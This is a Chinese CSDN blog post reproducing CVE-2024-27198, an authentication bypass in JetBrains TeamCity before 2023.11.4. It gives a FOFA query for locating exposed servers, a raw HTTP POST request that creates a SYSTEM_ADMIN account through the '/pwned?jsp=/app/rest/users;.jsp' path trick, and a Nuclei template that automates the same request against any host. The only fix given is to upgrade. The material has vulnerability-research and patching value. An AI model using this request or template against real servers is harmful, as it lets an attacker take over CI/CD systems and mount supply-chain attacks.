JetBrains TeamCity 身份验证绕过漏洞(CVE-2024-27198)

最新推荐文章于 2024-06-04 17:04:07 发布
最新推荐文章于 2024-06-04 17:04:07 发布
阅读量565 收藏 7
点赞数 6
分类专栏: 漏洞复现 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52204925/article/details/136491855
版权

免责声明:文章来源互联网收集整理,请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

                                                                                                                                     

目录

Ⅰ、漏洞描述

Ⅱ、fofa语句

Ⅲ、漏洞复现

1、发送数据包,创建管理员账户dada/dada

2、成功创建管理员账户,尝试登录

3、成功登录到创建的管理员账户

Ⅳ、Nuclei-POC

Ⅴ、修复建议

Ⅰ、漏洞描述

JetBrains TeamCity是一款由JetBrains开发的持续集成和持续交付(CI/CD)服务器。它提供了一个功能强大的平台,用于自动化构建、测试和部署软件项目。TeamCity旨在简化团队协作和软件交付流程,提高开发团队的效率和产品质量。

JetBrains TeamCity发布新版本修复了两个高危漏洞”JetBrains TeamCity 身份验证绕过漏洞(CVE-2024-27198)”与JetBrains TeamCity 路径遍历漏洞(CVE-2024-27199)。

恶意攻击者利用CVE-2024-27198可以绕过系统身份验证,创建管理员账户,完全控制所有TeamCity项目、构建、代理和构件,为攻击者执行供应链攻击。恶意攻击者利用该漏洞能够绕过身份认证在系统上执行任意代码。

影响版本

TeamCity < 2023.11.4

Ⅱ、fofa语句

body="Log in to TeamCity"

Ⅲ、漏洞复现

POC

POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/json
Accept-Encoding: gzip, deflate
 
{"username": "dada", "password": "dada", "email": "dada@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}

1、发送数据包,创建管理员账户dada/dada

2、成功创建管理员账户,尝试登录

3、成功登录到创建的管理员账户

Ⅳ、Nuclei-POC

id: JetBrains-TeamCity

info:
  name: 恶意攻击者利用CVE-2024-27198可以绕过系统身份验证,创建管理员账户,完全控制所有TeamCity项目、构建、代理和构件,为攻击者执行供应链攻击。恶意攻击者利用该漏洞能够绕过身份认证在系统上执行任意代码。
  author: WLF
  severity: high
  metadata: 
    fofa-query: body="Log in to TeamCity"
variables:
  filename: "{{to_lower(rand_base(5))}}"
  boundary: "{{to_lower(rand_base(20))}}"
http:
  - raw:
      - |
        POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
        Accept: */*
        Content-Type: application/json
        Accept-Encoding: gzip, deflate
        
        {"username": "{{filename}}", "password": "test", "email": "test@test.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}



    matchers:
      - type: dsl
        dsl:
          - status_code==200 && contains_all(body,"standalone=","{{filename}}")

Ⅴ、修复建议

升级至安全版本

Love Seed
关注
  • 6
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
JetBrains TeamCity 身份验证绕过漏洞复现(CVE-2024-27199)
m0_50797689的博客
03-06 447
JetBrains TeamCity 身份验证绕过漏洞复现(CVE-2024-27199)
JetBrains TeamCity 身份验证绕过漏洞复现(CVE-2024-27198)
0xSec
03-05 1602
JetBrains TeamCity发布新版本修复了两个高危漏洞JetBrains TeamCity 身份验证绕过漏洞(CVE-2024-27198)与JetBrains TeamCity 路径遍历漏洞(CVE-2024-27199)。未经身份验证的远程攻击者利用CVE-2024-27198可以绕过系统身份验证,创建管理员账户,完全控制所有TeamCity项目、构建、代理和构件,为攻击者执行供应链攻击。远程攻击者利用该漏洞能够绕过身份认证在系统上执行任意代码。
漏洞分析】CVE-2024-27198可RCE身份验证绕过JetBrains TeamCity
网络安全知识分享
03-11 1741
JetBrains发布了 TeamCity的风险通告,漏洞编号为 CVE-2024-27198漏洞等级:高危,漏洞评分:9.8
JetBrains TeamCity 身份验证绕过漏洞 CVE-2024-27198 未授权创建用户token】 + 上传恶意插件执行命令 反弹shell【复现漏洞】【有漏洞exp】
weixin_43977052的博客
03-07 1179
1、绕过限制,未授权生成token。2、利用创建用户token上传恶意插件以实现任意代码执行。
持续集成与teamcity的安装和使用
weixin_34221276的博客
07-19 936
持续集成:TeamCity 的安装和使用字数2840阅读1061评论2喜欢10TeamCity本文初衷让大家了解持续集成(CI),以及入门了解 JetBrains 家的 TeamCity 的一些简单实用。TeamCity 的一些复杂使用我暂时也不会,一样也是要看文档的,所以不管怎样你都要养成看官网文档的习惯。TeamCity 和 Jenkins、Hudson 其实是非常...
CVE-2024-27198 JetBrains TeamCity 身份验证绕过漏洞分析
shelter1234567的博客
03-07 1567
JetBrains TeamCity 是一款由 JetBrains 公司开发的持续集成和持续交付服务器。它提供了强大的功能和工具,旨在帮助开发团队构建、测试和部署他们的软件项目JetBrains TeamCity发布新版本修复了两个高危漏洞JetBrains TeamCity 身份验证绕过漏洞(CVE-2024-27198)与JetBrains TeamCity 路径遍历漏洞(CVE-2024-27199)。
terraform-provider-teamcityJetbrains TeamCity CI服务器的Terraform Provider
02-04
地形提供商TeamCity 动机: 安装 Terraform注册表-Terraform 0.13+(推荐) Teamcity Provider。 最简单的入门方法是按照。 例: terraform { required_providers { teamcity = { source = " cvbarros/team...
teamcity:dohq-teamcity是一个Python软件包,提供对JetBrains TeamCity服务器API的访问
05-24
团队合作 dohq-teamcity是一个Python软件包,提供对JetBrains TeamCity服务器API的访问。 该库支持所有方法,如果找不到,请创建问题。安装 # Latest releasepip install dohq-teamcity# Develop branchgit clone ...
teamcity-rest-client:用Kotlin编写的TeamCity REST API的客户端
05-02
teamcity-rest-client 用Kotlin编写的TeamCity REST API的客户端。 下面的代码片段将从最新的成功构建中下载*.zip工件,其标记publish指定的构建配置publish到out目录。 val docs = BuildConfigurationId ( " Kotlin...
tc-discord-webhooks:一个TeamCity插件,它为TeamCity添加了Discord Webhook支持!
02-16
一个TeamCity插件,可轻松创建Discord WebHooks,以通知Discord服务器上的用户项目的当前构建状态。 特征: Discord集成可在Discord服务器上获得通知 设置简单 开箱即用的精美讯息 系统要求 要使用此插件,您至少...
jetbrains-eval-reset
05-16
jetbrains-eval-reset
[CVE-2024-27198]TeamCity<2023.11.4 身份验证绕过漏洞
whoami
03-07 385
JetBrains TeamCity在2023.11.4版本之前存在认证绕过漏洞,由于getJspFromRequest方法中对jsp请求判断不严,导致攻击者可通过使用;.jsp),绕过身份验证,访问未授权的API。未授权的攻击者可能通过利用该漏洞获取TeamCity管理员access token,从而控制CI/CD服务。它提供了一个集成的平台,用于自动构建、测试和部署软件项目。TeamCity支持各种不同的编程语言和版本控制系统,包括但不限于Java、C#、Python、Git、SVN等。
TeamCity安装图文教程
学无止境
12-22 7071
1、下载Teamcity 9.0版本 http://www.jetbrains.com/teamcity/ 2、双击TeamCity-9.0.exe文件 点击“Next”,进入如下界面 点击“Next”,进入如下界面 等待安装,解压完成后,弹出如下界面 确认安装路径,访问地址后,点击save,进入如下界面,提示成功,则说明配置完成。 创建Tea
Teamcity+SVN+VisualStudio之持续集成简明指南
great3779的专栏
09-19 8139
Teamcity+SVN+VisualStudio之持续集成 简明指南   一、写在最前: 1.      各组件版本如下: Teamcity(简称tc)版本:8.1.4 SVN版本:TortoiseSVN 1.8.7 VS版本:VS2010. 10.0.30319.1 2.      关于CI(Continuousintegration,持续集成): 其重要性与关键性自不必多说
使用 TeamCity 实现持续集成(CI)
weixin_33738982的博客
01-09 381
原文同步至 https://waylau.com/continuous-integration-with-teamcity/ 持续集成(Continuous Integration),也就是我们经常说的 CI,是现代软件开发技术的基础。本文论述了如何使用 TeamCity 持续集成工具来实现项目的持续集成。 为我们什么需要 CI 目前,CI 已在当前业...
TeamCity : 配置 Build 过程
weixin_33843947的博客
11-27 676
Build 过程往往是比较复杂的,因此 TeamCtiy 通过 build 步骤的方式让您可以实现不同的应用场景。您可以在每个 build 步骤中只做一件事情,然后把一系列的 build 步骤组织起来按顺序执行来完成 build 过程。先看一下 build 步骤配置的概览: 每一个 Build 步骤都会对应一个 build runner 在背后完成真正的工作。我们要做的就是构思好 build 的...
TeamCity Plugin 安装 -- Static UI
iteye_11644的博客
03-17 305
1.   简介 With the help of this plugin you can add any HTML, JS or CSS to various pages of TeamCity UI. Plugin configuration files are located under .BuildServer/config/_static_ui_extensions. Use ...
安全生产月”专题报道:AI智能监控技术如何助力安全生产
最新发布
TSINGSEE青犀视频官方技术博客
06-04 821
方案能够通过对人员行为的识别和分析,判断是否存在安全隐患。这些功能的实现,有助于企业提高安全管理水平,减少因人为因素导致的安全事故。
jetbrains teamcity漏洞复现
12-22
接下来,可以使用各种方法来尝试利用漏洞,比如尝试输入特定的恶意代码、发送构建请求或者尝试绕过权限进行非法操作。如果成功复现了漏洞,就需要记录下复现的所有步骤和结果,并且通知JetBrains官方团队。 在通知...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值